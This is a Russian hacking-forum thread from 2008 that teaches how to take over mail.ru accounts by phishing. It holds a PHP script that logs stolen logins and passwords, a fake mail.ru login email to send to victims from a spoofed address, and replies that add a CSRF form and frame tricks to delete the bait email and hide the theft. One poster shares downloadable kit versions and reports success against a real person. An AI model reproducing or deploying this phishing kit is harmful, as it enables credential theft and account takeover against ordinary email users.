Авторские статьи Взлом почты на mail.ru [СИ]

Discussion in 'Статьи' started by Chaak, 6 Jun 2008.

  1. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    [::.INTRO.::]

    Привет! В этой небольшой статье я расскажу о том, как взломать ящик на mail.ru.
    Статья предназначена в первую очередь для новичков, в СИ(социальной инженерии ), а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
    Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.

    [::.ACTION.::]

    Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
    Можно зарегистрироваться на любом из этих(фейки/скамы там соотв. не приветсвуются):
    *только заранее убедитесь что хостинг поддерживает PHP
    Code:
    km.ru 
    nextmail.ru 
    hobby.ru 
    webrise.ru 
    lapin.ru 
    free.dl-hosting.ru 
    hostow.net 
    beplaced.ru 
    777host.ru 
    paltus.ru 
    miraclehost.ru 
    freebox.ru 
    alfaspace.net 
    k70.ru 
    hosting.promostudio.ru 
    chat.ru 
    maxhost.ru 
    nixup.com 
    e2e.ru 
    noka.ru 
    newmail.ru 
    boom.ru 
    h15.ru 
    hut.ru 
    jino-net.ru 
    pochta.ru 
    unlimhost.ru 
    onepage.ru 
    by.ru 
    sbn.bz 
    yard.ru 
    domainhosting.ru 
    orthodoxy.ru 
    webservis.ru 
    ru-web.net 
    activehost.ru 
    househost.ru 
    bestof.ru 
    addr.ru 
    hosting.dump.ru 
    pesni.ru 
    medbox.ru 
    fatal.ru 
    x5x.ru 
    hopshot.com 
    5gigs.com 
    wagoo.com 
    orgfree.com 
    awardspace.com 
    bobos.ca 
    www.host.sk 
    zportal.info 
    spaceall.de 
    3x.ro 
    sretenie.ru 
    dotgeek.org 
    sevhosting.net 
    o2g.net
    www.jino-net.ru
    www.nixup.com
    newmail.ru
    ho.com.ua/
    wallSt.ru
    hut.ru
    holm.ru
    e2e.ru
    fatal.ru
    host.sk
    ut.ru
    H1.ru
    Hostmos.ru
    Webm.ru
    Rdcom.ru
    narod.ru
    front.ru
    nm.ru 
    chat.ru 
    boom.ru 
    by.ru
    
    После регистрации:
    Во-первых, нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
    PHP:
    <?php
    error_reporting
    (0);
    $f=fopen("mail.txt","at"); # файл куда сохранять
    flock($f,2);
    fputs($f,$_GET['Login']."@"); #логин
    fputs($f,$_GET['Domain']); #домен
    fputs($f,";".$_GET['Password']."\n"); # пароль
    flock($f,3);
    fclose($f);
    header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312");
    Рассмотрим скрипт поподробнее:
    PHP:
    header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312");
    Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
    • Сохраним в файл mes.php и зальем на хостинг.
    • Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777, что позволит нам записывать логины в файл.

    Приступим к самому письму, которое мы будем отправлять жертве на мыло.
    Код письма:
    PHP:
    <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
    <
    td id=aj_body>
    <
    div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
    <
    table cellpadding=0 cellspacing=0 border=class=login>
    <
    tr>
    <
    td>Пользователь отправил вам скрытое письмо.<brДля просмотра письма введите ваш логин и пароль .<br> </a></p></td>
    </
    tr>
    </
    table><font color=00;33;66 FACE="Arial" >
    <
    h4 >Авторизация</h4>
    </
    font>
    <
    table cellpadding=0 cellspacing=0 border=class=login>
    <
    form method="GET" action="http://адрес фейка/mes.php">
    <
    input type="hidden" name="mail" value="1">
    <
    tr>
    <
    td width=75>
    <
    img src=http://img.mail.ru/0.gif height=1><br>Имя
    </td>
    <
    td width=150>
    <
    input type="text" name="Login">
    </
    td>
    <
    td width=75>
    <
    select name="Domain">
    <
    option value="mail.ru" SELECTED>@mail.ru</option>
    <
    option value="inbox.ru">@inbox.ru</option>
    <
    option value="list.ru" >@list.ru</option>
    <
    option value="bk.ru" >@bk.ru</option>
    </
    select>
    </
    td>
    </
    tr>
    <
    tr>
    <
    td>
    Пароль
    </td
    <
    td>
    <
    input type="password" name="Password">
    </
    td>
    <
    td>
    <
    a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
    </
    td>
    </
    tr>

    <
    tr
    <
    td> </td>
    <
    td>
    <
    input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
    </
    td>
    <
    td> </td>
    </
    tr>
    <
    tr>
    <
    td> </td>
    <
    td>
    <
    input type="Submit" value=" Войти " xstyle="margin-top:4px">
    </
    td>
    <
    td> </td>
    </
    tr></form>
    </
    table><br><br>
    Чтобы подробней узнать об услугах посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
    Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
    <
    base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>
    Укажите в параметре action тега form - адресс вашего сайта,который вы зарегистрировали выше, и путь к снифферу mes.php.
    [!] Надо обратить внимание на то, что данные должны передоваться методом "GET", Иначе ничего не выйдет.
    Теперь остается отправить жертве письмо, желательно с подменой адреса.
    Сделать это можно, например тут:
    Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
    Если жертва введет свои логин и пароль, то вам повезло.
    Узнать пароли вы сможете в файле mail.txt.

    [::.END.::]
     
    #1 Chaak, 6 Jun 2008
    Last edited: 18 Feb 2012
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)
     
    #2 sabe, 6 Jun 2008
    Last edited: 6 Jun 2008
    1 person likes this.
  3. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
    юудь то ббрут или протроянивание или фейки
    поставил + статья наиболее полная для новичка
     
    1 person likes this.
  4. [:|||||:]

    [:|||||:] Banned

    Joined:
    29 May 2008
    Messages:
    68
    Likes Received:
    59
    Reputations:
    11
    А как же это?
    [​IMG]
     
  5. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    так дополняй скорее свою статью
    :(
     
  6. ufoPlast

    ufoPlast Elder - Старейшина

    Joined:
    24 Feb 2007
    Messages:
    107
    Likes Received:
    52
    Reputations:
    0
    Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
    Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
    Я считаю не нужно отбивать у людей желание писать, хоть что то...
     
    1 person likes this.
  7. m9chik

    m9chik Elder - Старейшина

    Joined:
    20 Jun 2007
    Messages:
    68
    Likes Received:
    56
    Reputations:
    -5
    Моё мнение:
    Не сложно,просто.
    Но таких тем действительно было оч много.
    Это называеться фейк и автор ничё про это не сказал.
    Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.
     
  8. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    XSS или XSS + ФЕЙК ...
     
    1 person likes this.
  9. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
     
    #9 Zitt, 7 Jun 2008
    Last edited: 7 Jun 2008
    1 person likes this.
  10. byblik

    byblik Elder - Старейшина

    Joined:
    1 Oct 2006
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -5
    А я соглашусь с ufoPlast, все он правильно сказал.
     
  11. Lucky_Student

    Lucky_Student Elder - Старейшина

    Joined:
    13 Apr 2008
    Messages:
    98
    Likes Received:
    39
    Reputations:
    -5
    ИМХО, СИ легче юзать на Яндексе.
    Поясню:
    - Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
    - Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

    Вообщем мну предпочитает яндекс. :)
    Хотя мэйл тоже слабо защищен...
     
    1 person likes this.
  12. cb93ka

    cb93ka Elder - Старейшина

    Joined:
    4 Jan 2007
    Messages:
    36
    Likes Received:
    13
    Reputations:
    3
    а что мешает "анонимно" послать мыло от [email protected] ?
     
  13. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Тема немного старовата, но я вставлю свои 5 копеек :)
    1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
    2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

    Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
    http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
    это перенесёт письмо в корзину, потом вызываем
    http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
    Это спросит хотимли мы удалить навсегда письмо?
    Дальше вот такая форма
    HTML:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
    <title>x3k</title>
    </head>
    <body onload="pe4enkiiiii.submit()">
    <form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
    <input type="hidden" name="confirm" value="on">
    <input type="hidden" name="remove" value="1">
    <input type="hidden" name="id" value="[COLOR=Red]messid[/COLOR]">
    </form>
    </body>
    </html>
    Это сносит письмо насмерть :D
    Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
    Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним :)

    Не тестировал, токо частично, должно работать... :)
    Протестировал, работает :D
    =============
    ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно :D
     
    #13 Ponchik, 2 Aug 2008
    Last edited: 2 Aug 2008
    8 people like this.
  14. deniska1517

    deniska1517 Elder - Старейшина

    Joined:
    1 May 2008
    Messages:
    94
    Likes Received:
    70
    Reputations:
    -5
    молодец, уделил время, написал. ну, что - + вообщем
     
  15. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия :)

    В скрипте 5 файлов
    index.php - скрипт, записывающий инфу в логи
    frame.php - скрипт, удаляющий письмо
    log.txt - подробный лог
    minilog.txt - пишется мыло и пасс
    readme.html - инструкция с HTML кодом который надо отсылать

    В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер :)

    Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу :D
    Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? :cool:
    :D
    P.S> Впервые этим занимаюсь и просто от нечего делать :)
    =========
    Гы гы, чел в аське повёлся :D Мля, а это работает оказывается :)))
    Кстате в .htaccess пропишите
    Code:
    <files "log.txt">
    order allow,deny
    deny from all
    </files>
    <files "minilog.txt">
    order allow,deny
    deny from all
    </files>
    Ато не кайф если логи прочитают
     
    #15 Ponchik, 2 Aug 2008
    Last edited: 2 Aug 2008
  16. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))
     
  17. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Сделал, http://slil.ru/26028567 пасс antichat
    Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
    +При открытии письма мы узнаем об этом
    +В инструкцию добавлен javascript, чтоб дого не копаться
    +Добавлен .htaccess чтоб сами не разбирались что там и куда
    =====================
    Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

    <h1>Ты грязный овце*б :D </h1>
    <img src="http://win.mail.ru/cgi-bin/logout">

    Такое западло :) Но можно будет удалить письмо из списка :(
     
    #17 Ponchik, 2 Aug 2008
    Last edited: 2 Aug 2008
    9 people like this.
  18. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Пару слов скажу.
    1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
    2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?
     
  19. iron-viper

    iron-viper Elder - Старейшина

    Joined:
    13 Nov 2007
    Messages:
    167
    Likes Received:
    45
    Reputations:
    3
    Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.
     
    1 person likes this.
  20. MRAK9

    MRAK9 Member

    Joined:
    29 Jul 2007
    Messages:
    115
    Likes Received:
    26
    Reputations:
    0
    Дело в том что твой код отправляется как txt
    Не морочь себе голову и используй скрипт(отправил в личку)
     
    1 person likes this.